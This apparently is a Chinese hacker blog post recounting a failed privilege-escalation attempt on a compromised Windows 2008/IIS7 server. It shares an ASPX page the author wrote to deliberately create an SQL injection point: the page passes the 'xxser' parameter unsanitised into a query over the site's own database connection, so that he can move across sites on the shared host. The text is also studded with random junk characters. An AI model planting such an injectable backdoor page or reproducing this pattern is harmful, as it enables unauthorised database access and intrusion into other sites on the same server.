利用aspx构造注射来跨站

admin

昨天跟4z1看一个站点，提权很难提，看了整整5个小时，无果。 2008+iis7，无sa，无root，无各种服务。。。
( h+ _9 i; G; M$ K1 I其实中用到了aspx构造注射来跨站，网上找了一堆代码，没一个能用的。
, c, u2 J3 ^# X9 [, n' x, a7 B代码量不多，自己写个拉倒了。烦死了。

' B5 n7 ^) @1 V6 `, s! }# v​
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1 g% w$ S8 Y! _, q8 a; ~$ p, j+ n; k<head runat="server">
    <title>暗影aspx构造注射专用页面</title>
</head>
<body>
% D0 _4 x" F1 u/ n4 K    <form id="form1" runat="server">
    <div>
3 e& J7 ]6 g& X; c8 J     <script language="c#" runat="server">
            
         void page_init(object sender, EventArgs e)
         {
, K- d' q9 b1 X( A- [+ A            
             System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
            
             conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
3 H7 ^4 L% i9 `4 t5 T3 r7 t% d- O             conn.Open();
" G* j& _6 N/ I( ^            
* H" ?4 R, ?$ s/ G7 z             string i =  this.Page.Request.Params["xxser"];  //这里是参数?xxser=1
            
- W4 z- L7 R; E3 E             System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
8 ^& q' A  [' R5 j6 r" ]5 y             int x = command.ExecuteNonQuery();
) e( z2 p: R9 I# ?7 _             Response.Write(i+"\n");
             Response.Write(x);
             conn.Close();
& B6 S7 X+ @8 M         }
     
  </script>
    </div>
    </form>
</body>
</html>
3 {8 G6 F( S, I" Y, R4 H